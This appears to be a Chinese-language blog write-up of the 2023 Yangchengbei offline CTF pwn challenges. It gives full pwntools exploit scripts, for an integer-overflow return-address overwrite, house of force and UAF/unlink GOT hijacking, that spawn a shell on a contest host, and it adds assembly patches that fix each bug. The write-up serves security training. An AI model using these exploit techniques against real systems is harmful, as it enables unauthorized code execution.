2023-羊城杯线下-pwn-wp

本文最后更新于:2023年9月12日 下午

2023-羊城杯-pwn-wp

arrary_index_bank

break

整数溢出,泄露程序地址,覆盖返回地址为后门地址。

image-20230912000231865

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
#!/usr/bin/python
#encoding:utf-8

from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'

fn = './pwn'
elf = ELF(fn)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

debug = 0
if debug:
    p = process(fn)

else:
    p = remote('10.1.102.102', 10000)
    

def dbg(s=''):
    if debug:
        gdb.attach(p, s)
        pause()

    else:
        pass
    
lg = lambda x, y: log.success(f'{x}: {hex(y)}')


def show(idx):
    p.sendlineafter('You current have', '1')
    p.sendlineafter('Whose account?', str(-0x8000000000000000 + idx))

def write(idx, data):
    p.sendlineafter('You current have', '2')
    p.sendlineafter('Whose account?', str(-0x8000000000000000 + idx))   # 7 ret
    p.sendlineafter('How much?', str(data))


show(7)
p.recvuntil('] = ')
codebase = int(p.recv(14), 10) - 0x151b
lg('codebase', codebase)

# dbg('b *$rebase(0x14D2)')

backdoor = codebase + 0x1315
write(7, backdoor)

p.sendlineafter('You current have', '3')

p.interactive()

fix

将两处有符号数比较patch为无符号数比较即可。

image-20230912001210491

image-20230912001354980

easy_force

break

堆溢出 + house of force。

image-20230912000533158

思路:

  1. 申请大堆块泄露libc地址,泄露heap地址

  2. 堆溢出覆盖top_chunk大小为-1

  3. 覆盖malloc_got为system

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
#!/usr/bin/python
#encoding:utf-8

from pwn import *
from pwn import p64, u64

context.arch = 'amd64'
context.log_level = 'debug'

fn = './pwn'
elf = ELF(fn)
libc = ELF('./libc.so.6')

debug = 0
if debug:
    p = process(fn)

else:
    p = remote('10.1.102.102', 10002)
    

def dbg(s=''):
    if debug:
        gdb.attach(p, s)
        pause()

    else:
        pass
    
lg = lambda x, y: log.success(f'{x}: {hex(y)}')


def menu(idx):
    p.sendlineafter('away', str(idx))


def add(idx, size, data):
    menu(1)
    p.sendlineafter('which index?', str(idx))
    p.sendlineafter('space do u want?', str(size))
    p.sendafter('what to write?', data)


add(0, 0x60000, b'\n')
p.recvuntil(b'the balckbroad on ')
# libc_base = int(p.recvuntil(b' '), 16) - 0x585010
libc_base = int(p.recvuntil(b' '), 16) - 0x58b010
lg('libc_base', libc_base)

system = libc_base + libc.sym['system']

payload = b'/bin/sh'.ljust(0x18, b'\x00') + p64(0xffffffffffffffff)
add(1, 0x18, payload)

p.recvuntil(b'the balckbroad on ')
ptr = int(p.recvuntil(b' '), 16)
lg('ptr: ', ptr)

malloc_got = elf.got['malloc']

top_chunk = ptr + 0x10
target_addr = malloc_got - 0x20 - top_chunk
add(2, target_addr, '\n')
add(3, 0x18, p64(system) * 2)

# dbg()

menu(1)
p.sendlineafter('which index?', str(4))
p.sendlineafter('space do u want?', str(ptr))

p.interactive()

fix

将heap overflow固定大小修复为输入大小。

image-20230912001627658

image-20230912001643985

Printf_but_not_fmtstr

break

uaf漏洞,限制了IO操作,且程序无法通过exit退出。

image-20230912000754833

思路:

  1. uaf泄露libc地址
  2. 简单堆风水触发unlink,劫持heap数组
  3. 任意地址写,覆盖free_got为system
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'

fn = './pwn'
elf = ELF(fn)
libc = ELF('./libc.so.6')

debug = 1
if debug:
    p = process(fn)
else:
    p = remote('10.1.102.102', 10001)

def dbg(s=''):
    if debug:
        gdb.attach(p, s)
        pause()

    else:
        pass

lg = lambda x, y: log.success(f'{x}: {hex(y)}')

    
def menu(index):
    p.sendlineafter('>', str(index))


def add(index, size):
    menu(1)
    p.sendlineafter('Index: ', str(index))
    p.sendlineafter('Size: ', str(size))


def show(index):
    menu(4)
    p.sendlineafter('Index: ', str(index))


def edit(index, content):
    menu(3)
    p.sendlineafter('Index: ', str(index))
    p.sendafter('Content: ', content)


def delete(index):
    menu(2)
    p.sendlineafter('Index: ', str(index))


add(0, 0x580)
add(1, 0x580)
add(2, 0x580)

delete(0)
show(0)
p.recvuntil(b'Content: ')
libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 0x1f6cc0
lg('libc_base: ', libc_base)

delete(1)
add(3, 0x590)
edit(1, flat([0, 0x581, 0x4040E8 - 0x18, 0x4040E8 - 0x10]))
delete(2)

free_got = elf.got['free']
system = libc_base + libc.sym['system']

edit(2, b'/bin/sh\x00')
edit(1, flat([0, 0, free_got]))
edit(0, p64(system))

# dbg()

delete(2)

p.interactive()

fix

修改前汇编代码。

1
2
3
4
5
6
7
8
9
10
.text:00000000004014A1                               loc_4014A1:
.text:00000000004014A1 8B 45 F4                      mov     eax, [rbp+var_C]
.text:00000000004014A4 89 C0                         mov     eax, eax
.text:00000000004014A6 48 8D 14 C5 00 00 00 00       lea     rdx, ds:0[rax*8]
.text:00000000004014AE 48 8D 05 2B 2C 00 00          lea     rax, heap
.text:00000000004014B5 48 8B 04 02                   mov     rax, [rdx+rax]
.text:00000000004014B9 48 89 C7                      mov     rdi, rax              ; ptr
.text:00000000004014BC E8 DF 2C 00 00                call    free
.text:00000000004014C1                               loc_4014C1:
.text:00000000004014C1 90                            nop

修改后汇编代码。

1
2
3
4
5
6
7
8
9
10
11
.text:00000000004014A1                               loc_4014A1:
.text:00000000004014A1 8B 45 F4                      mov     eax, [rbp+var_C]
.text:00000000004014A4 89 C0                         mov     eax, eax
.text:00000000004014A6 48 8D 14 C5 00 00 00 00       lea     rdx, ds:0[rax*8]
.text:00000000004014AE 48 8D 05 2B 2C 00 00          lea     rax, heap
.text:00000000004014B5 48 8B 04 02                   mov     rax, [rdx+rax]
.text:00000000004014B9 48 89 C7                      mov     rdi, rax              ; ptr
.text:00000000004014BC E9 97 0C 00 00                jmp     loc_402158
.text:00000000004014C1                               loc_4014C1:
.text:00000000004014C1 90                            nop

1
2
3
4
5
6
7
8
9
10
11
.eh_frame:0000000000402158                               loc_402158: 
.eh_frame:0000000000402158 E8 D3 EE FF FF                call    _free
.eh_frame:000000000040215D 8B 45 F4                      mov     eax, [rbp-0Ch]
.eh_frame:0000000000402160 48 98                         cdqe
.eh_frame:0000000000402162 48 8D 04 C5 00 00 00 00       lea     rax, ds:0[rax*8]
.eh_frame:000000000040216A 48 89 C2                      mov     rdx, rax
.eh_frame:000000000040216D 48 8D 05 6C 1F 00 00          lea     rax, heap
.eh_frame:0000000000402174 49 C7 C0 00 00 00 00          mov     r8, 0
.eh_frame:000000000040217B 4C 89 04 10                   mov     [rax+rdx], r8
.eh_frame:000000000040217F E9 3E F3 FF FF                jmp     loc_4014C2
.eh_frame:000000000040217F

image-20231026141044529

PWN
#pwn #wp
2023-羊城杯线下-pwn-wp
http://example.com/2023/09/11/2023-羊城杯线下赛-pwn-wp/
作者
l1s00t
发布于
2023年9月11日
更新于
2023年9月12日
许可协议